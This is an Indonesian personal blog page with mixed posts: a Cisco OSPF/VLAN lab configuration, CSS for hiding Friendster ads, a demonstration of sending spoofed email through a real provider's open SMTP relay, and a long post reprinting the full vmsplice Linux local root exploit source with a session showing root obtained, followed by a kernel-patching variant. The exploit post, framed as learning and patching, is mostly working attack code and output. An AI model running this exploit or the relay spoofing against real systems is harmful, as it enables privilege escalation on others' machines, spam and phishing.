Tuesday, March 11, 2008

OSPF + VLAN

note : neh orang minta photo sambil gaya :D , miss my friends in snap ui cisco ......




Neh Hasil ujicoba Ngelab - Selama ikut cisco silahkan menikmati ya bisa diconfig pakai paket tracert atau boson simulator tergantung selera masing-masing

VLAN – TRUNKING LAB CONFIGURATION





SWITCH CONFIGURATION :

NAMA VLAN PORT
VLAN 20 9, 10
VLAN 30 17, 18
TRUNK 23, 24
VLAN 1 SISA PORT

Port Security : port 9 dan 17

SKENARIO ACCESS-LIST
VLAN 1 (A – B) full access ke server 50.50.50.50 dan 100.100.100.100
VLAN 20 (A – B) permit akses http ke 50.50.50.50 dan telnet ke 100.100.100.100
VLAN 30 (A – B) permit akses telnet ke 50.50.50.50 dan http ke 100.100.100.100
VLAN 1 (A) hanya boleh akses ke VLAN 1 (B) dan sebaliknya
VLAN 2 (A) hanya boleh akses ke VLAN 2 (B) dan sebaliknya
VLAN 3 (A) hanya boleh akses ke VLAN 3 (B) dan sebaliknya




ROUTER-A CONFIGURATION

router#conf ig terminal
router(config)#hostname ROUTER-A
ROUTER-A(config)#enable secret cisco

ROUTER-A(config)#line vty 0 4
ROUTER-A(config-line)#password cisco
ROUTER-A(config-line)#login
ROUTER-A(config-line)#exit

ROUTER-A(config)#int fa0/0.1
ROUTER-A(config-subif))#encapsulation dot1q 1
ROUTER-A(config-subif))#ip address 150.150.1.1 255.255.255.0
ROUTER-A(config-subif))#ip access-group 101 in
ROUTER-A(config-subif))#no shut
ROUTER-A(config-subif))#exit

ROUTER-A(config)#int fa0/0.2
ROUTER-A(config-subif))#encapsulation dot1q 20
ROUTER-A(config-subif))#ip address 150.150.2.1 255.255.255.0
ROUTER-A(config-subif))#ip access-group 102 in
ROUTER-A(config-subif))#no shut
ROUTER-A(config-subif))#exit

ROUTER-A(config)#int fa0/0.3
ROUTER-A(config-subif))#encapsulation dot1q 30
ROUTER-A(config-subif))#ip address 150.150.3.1 255.255.255.0
ROUTER-A(config-subif))#ip access-group 103 in
ROUTER-A(config-subif))#no shut
ROUTER-A(config-subif))#exit

ROUTER-A(config)#int s0/0
ROUTER-A(config-if)#ip address 150.150.7.13 255.255.255.252
ROUTER-A(config-if)#clockrate 64000 (if DCE type)
ROUTER-A(config-if)#no shutdown
ROUTER-A(config-if)#exit

ROUTER-A(config)#int s0/1
ROUTER-A(config-if)#ip address 150.150.7.6 255.255.255.252
ROUTER-A(config-if)#clockrate 64000 (if DCE type)
ROUTER-A(config-if)#no shutdown
ROUTER-A(config-if)#exit

ROUTER-A(config)#router ospf 1
ROUTER-A(config-router)#network 150.150.1.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.2.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.3.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-A(config-router)#network 150.150.7.4 0.0.0.3 area 0
ROUTER-A(config-router)#exit

ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 host 50.50.50.50
ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 host 100.100.100.100
ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 150.150.4.0 0.0.0.255

ROUTER-A(config)#access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 50.50.50.50 eq www
ROUTER-A(config)#access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 100.100.100.100 eq telnet
ROUTER-A(config)#access-list 102 permit ip 150.150.2.0 0.0.0.255 150.150.5.0 0.0.0.255

ROUTER-A(config)#access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 50.50.50.50 eq telnet
ROUTER-A(config)#access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 100.100.100.100 eq www
ROUTER-A(config)#access-list 103 permit ip 150.150.3.0 0.0.0.255 150.150.6.0 0.0.0.255



ROUTER-B CONFIGURATION

router#conf ig terminal
router(config)#hostname ROUTER-B
ROUTER-B(config)#enable secret cisco

ROUTER-B(config)#line vty 0 4
ROUTER-B(config-line)#password cisco
ROUTER-B(config-line)#login
ROUTER-B(config-line)#exit

ROUTER-B(config)#int fa0/0.1
ROUTER-B(config-subif))#encapsulation dot1q 1
ROUTER-B(config-subif))#ip address 150.150.4.1 255.255.255.0
ROUTER-B(config-subif))#no shut
ROUTER-B(config-subif))#exit

ROUTER-B(config)#int fa0/0.2
ROUTER-B(config-subif))#encapsulation dot1q 20
ROUTER-B(config-subif))#ip address 150.150.5.1 255.255.255.0
ROUTER-B(config-subif))#no shut
ROUTER-B(config-subif))#exit

ROUTER-B(config)#int fa0/0.3
ROUTER-B(config-subif))#encapsulation dot1q 30
ROUTER-B(config-subif))#ip address 150.150.6.1 255.255.255.0
ROUTER-B(config-subif))#no shut
ROUTER-B(config-subif))#exit

ROUTER-B(config)#int s0/0
ROUTER-B(config-if)#ip address 150.150.7.9 255.255.255.252
ROUTER-B(config-if)#clockrate 64000 (if DCE type)
ROUTER-B(config-if)#no shutdown
ROUTER-B(config-if)#exit

ROUTER-B(config)#int s0/1
ROUTER-B(config-if)#ip address 150.150.7.14 255.255.255.252
ROUTER-B(config-if)#clockrate 64000 (if DCE type)
ROUTER-B(config-if)#no shutdown
ROUTER-B(config-if)#exit

ROUTER-B(config)#router ospf 1
ROUTER-B(config-router)#network 150.150.4.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.5.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.6.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-B(config-router)#network 150.150.7.8 0.0.0.3 area 0



ROUTER-C CONFIGURATION

router#conf ig terminal
router(config)#hostname ROUTER-C
ROUTER-C(config)#enable secret cisco

ROUTER-C(config)#line vty 0 4
ROUTER-C(config-line)#password cisco
ROUTER-C(config-line)#login
ROUTER-C(config-line)#exit

ROUTER-C(config)#int s0/0
ROUTER-C(config-if)#ip address 150.150.7.5 255.255.255.252
ROUTER-C(config-if)#clockrate 64000 (if DCE type)
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int s0/1
ROUTER-C(config-if)#ip address 150.150.7.10 255.255.255.252
ROUTER-C(config-if)#clockrate 64000 (if DCE type)
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int loopback 0
ROUTER-C(config-if)#ip address 50.50.50.50 255.0.0.0
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int loopback 1
ROUTER-C(config-if)#ip address 100.100.100.100 255.0.0.0
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#router ospf 1
ROUTER-C(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-C(config-router)#network 150.150.7.8 0.0.0.3 area 0
ROUTER-C(config-router)#network 50.0.0.0 0.255.255.255 area 0
ROUTER-C(config-router)#network 100.0.0.0 0.255.255.255 area 0



SWITCH A DAN B CONFIGURATION

switch#vlan database
switch(vlan)#vlan 20
switch(vlan)#vlan 30
switch(vlan)#exit

switch#config terminal
switch(config)#enable secret cisco
switch(config)#line vty 0 15
switch(config-line)#password cisco
switch(config-line)#login
switch(config-line)#exit

switch(config)#int fa0/9
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 20
switch(config-if)#switchport port-security
switch(config-if)#switchport port-security maximum 1
switch(config-if)#switchport port-security violation shutdown
switch(config-if)#exit

switch(config)#int fa0/10
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 20
switch(config-if)#exit

switch(config)#int fa0/17
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 30
switch(config-if)#switchport port-security
switch(config-if)#switchport port-security maximum 1
switch(config-if)#switchport port-security violation shutdown
switch(config-if)#exit

switch(config)#int fa0/18
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 30
switch(config-if)#exit

switch(config)#int fa0/23
switch(config-if)#switchport mode trunk
switch(config-if)#exit

switch(config)#int fa0/24
switch(config-if)#switchport mode trunk
switch(config-if)#exit

switch(config)#interface vlan 1
switch(config-if)#ip address 150.150.1.2 255.255.255.0 (SWITCH A)
switch(config-if)#ip address 150.150.4.2 255.255.255.0 (SWITCH B)
switch(config-if)#no shut
switch(config-if)#exit

switch(config)#ip daefault-gateway 150.150.1.1 (SWITCH A)
switch(config)#ip daefault-gateway 150.150.4.1 (SWITCH B)

Hilangkan Banner di Friendster

Situs pertemanan ini situs yang paling mendunia , tapi namanya situs pasti makin dikunjungi makin banyak banner nya deh lebih baik kita hilangkan aja kali ya ... supaya hemat bandwidth dan lebih cepat

simpan file ini menjadi hilang.css upload di geocities

/******awal copy*****/
/* hide google ads */
#googleAdFactory.fullwidth{position:absolute;top:-5500px;}

/* remove featured sponsor */

#mainnav div.links a:link, #mainnav div.links a:visited, #mainnav div.links

a:active { color:#000000; text-decoration:none; }
}
#mainnav .left {display:none;}
#mainnav .right {display:none;}
#navdivider {display:none;background:transparent;}
#subnav {display:none;}
#marketing_bg{display:none;background:transparent;}

/* remove search form*/V
#search {display:none;background:transparent;}
#search form {display:none;background:transparent;}
.banner_ad_fix{display:none;}
#banneradrow, #ads_2_3{display:none;}
#content_14 {
display:none;
}
/**********akhir copy**********/

edit profile lalu masukkan favorite music sbb :




hasil pengujian sendiri dan berhasil ... dan selamat mencoba


source : http://www.sekuritionline.net/forumsekuriti/viewtopic.php?t=414

Open Relay berbahayakah ??

disini saya mencoba menggunakan bagaimana open relay digunakan pada smtp.telkom.net

apakah berbahaya .... mari kita lihat ....

[root@boc ~]# telnet smtp.telkom.net 25
Trying 10.11.15.37...
Connected to smtp.telkom.net (10.11.15.37).
Escape character is '^]'.
220-out-mta1.plasa.com 76 ESMTP Tue, 11 Mar 2008 13:07:12 +0700.
220-Not for public use. Only registered users and servers allowed.
220 UBE, porn, and abusive content not allowed.
set local_echo
500 unrecognized command
helo smtp.telkom.net
250 out-mta1.plasa.com Hello smtp.telkom.net [10.11.21.200]
mail from : iqbal@iqbal-ganteng.com
500 unrecognized command
mail from: iqbal@iqbal.com
250 OK
rcpt to: just_comp@yahoo.com
250 Accepted
data
354 Enter message, ending with "." on a line by itself
subject: email send
hi disana pakabar.

.

saya membuka header di email saya ...

X-Apparently-To: just_comp@yahoo.com via 206.190.39.122; Mon, 10 Mar 2008 23:09:33 -0700
X-Originating-IP: [203.130.196.76]
Return-Path:
Authentication-Results: mta511.mail.mud.yahoo.com from=; domainkeys=neutral (no sig)
Received: from 203.130.196.76 (EHLO out-mta1.plasa.com) (203.130.196.76) by mta511.mail.mud.yahoo.com with SMTP; Mon, 10 Mar 2008 23:09:32 -0700
Received: from HELO smtp.telkom.net by out-mta1.plasa.com 76 with smtp id 1JYxfM-0006vX-AV for just_comp@yahoo.com; Tue, 11 Mar 2008 13:09:23 +0700
Subject: email send
Content-Length: 20

hi disana pakabar.


wah bagi saya memang berbahaya jelas ... kenapa ? karena saya bisa melakukan social
engineering terhadap korban yang membawa kasus ini bisa ke teknik phising dll
memasang trap disana sini .... hingga berhasil ...

yah ini digunakan oleh spammer ...

Kamu Ketahuan .......

jika ingin mengetahui online , invisible pada yahoo messengger bisa menggunakan link

http://en.xeeber.com/ atau
http://invisible.ir

sepandai-pandai orang sembunyi pasti ketauan juga belangnya ........ :D

Monday, March 10, 2008

Tambal Ban yang Bocor

Tujuan artikel ini untuk pembelajaran bagaimana melakukan local exploit .... lalu kita mempatching pada VMSPLICE , vmsplice ini sungguh mengejutkan saya karena dengan bug ini saya bisa eksekusi lalu dapat id superuser, berikut penelurusannya ...

Saya menginstall backtrack dengan emulator vmware sebagai ujicoba.

bt ~ $ uname -a ;id ; w
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
uid=1000(iqbal) gid=100(users) groups=100(users)
13:05:42 up 1:48, 2 users, load average: 0.15, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:42m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 1.00s 0.18s 0.02s w

SOurce Exploit

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

// milw0rm.com [2008-02-09]

bt ~ $ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--13:16:44-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
=> `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[==================================================================================>] 6,264 23.51K/s

13:16:47 (23.42 KB/s) - `27704.c' saved [6264/6264]

bt ~ $ gcc -o 27704 27704.c
bt ~ $ ./27704
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7da5000 .. 0xb7dd7000
[+] root
bt ~ # id ; uname -s ;w
uid=0(root) gid=0(root) groups=100(users)
Linux
13:17:13 up 2:00, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:54m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 0.00s 0.24s 0.26s sshd: iqbal [priv]

Dapat Akar ......

Source Patching


/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/

#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void de_exploit()
{
char line[4096];
FILE* ksyms = fopen("/proc/kallsyms", "r");
size_t address = 0;

if(!ksyms)
{
perror("Could not open /proc/kallsyms");

exit(EXIT_FAILURE);
}

while(fgets(line, sizeof(line), ksyms))
{
if(strstr(line, " sys_vmsplice"))
{
sscanf(line, "%zx", &address);

break;
}
}

if(!address)
{
fprintf(stderr, "Address not found\n");

exit(EXIT_FAILURE);
}

int fd = open("/dev/kmem", O_RDWR);

if(fd == -1)
{
perror("open(\"/dev/kmem\")");

exit(EXIT_FAILURE);
}

char* map = mmap(0, 0x200000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address & ~0xFFF);

if(map == MAP_FAILED)
{
perror("mmap");

exit(EXIT_FAILURE);
}

map[address & 0xfff] = 0xc3; /* 0xC3 = RET */

fprintf(stderr, "Exploit gone!\n");

exit(EXIT_SUCCESS);
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
de_exploit(); // mortehu
//putenv("HISTFILE=/dev/null");
//execl("/bin/bash", "bash", "-i", NULL);
//die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}


$ wget http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitab
--13:18:42-- http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitable.c
=> `disable-vmsplice-if-exploitable.c'
Resolving forums.ubuntu.com.my... 66.33.209.35
Connecting to forums.ubuntu.com.my|66.33.209.35|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,104 (7.9K) [text/plain]

100%[==================================================================================>] 8,104 17.95K/s

bt ~ $ gcc -o patch disable-vmsplice-if-exploitable.c
bt ~ $ ./patch
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e58000 .. 0xb7e8a000
[+] root
Exploit gone!

jalanin kembali local exploit

bt ~ $ ./27704
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7db1000 .. 0xb7de3000
[-] vmsplice

bt ~ $ id ; uname -a ; w
uid=1000(iqbal) gid=100(users) groups=100(users)
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
13:21:02 up 2:04, 2 users, load average: 0.01, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:58m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 0.00s 0.27s 0.02s w

berhasil patching deh ..

Tidak ada cinta bila tidak ada kebebasan dan pada hakekatnya kebebasan itu tidak dapat diperintah atau dikuasai. Permusuhan dan perselisihan mungkin disebabkan oleh benih kebaikan serta kebebasan yang seharusnya tumbuh tapi terhalang oleh kesempitan dunia. Cintalah yang memungkinkan kebebasan itu berkembang karena cinta adalah kemurahan hati, yang selalu siap memaafkan. Kebencian adalah sia-sia. (Sindhunata)

sumber : milw0rm
http://forums.ubuntu.com.my

ternyata explorasi saya berhasil ... indahnya .......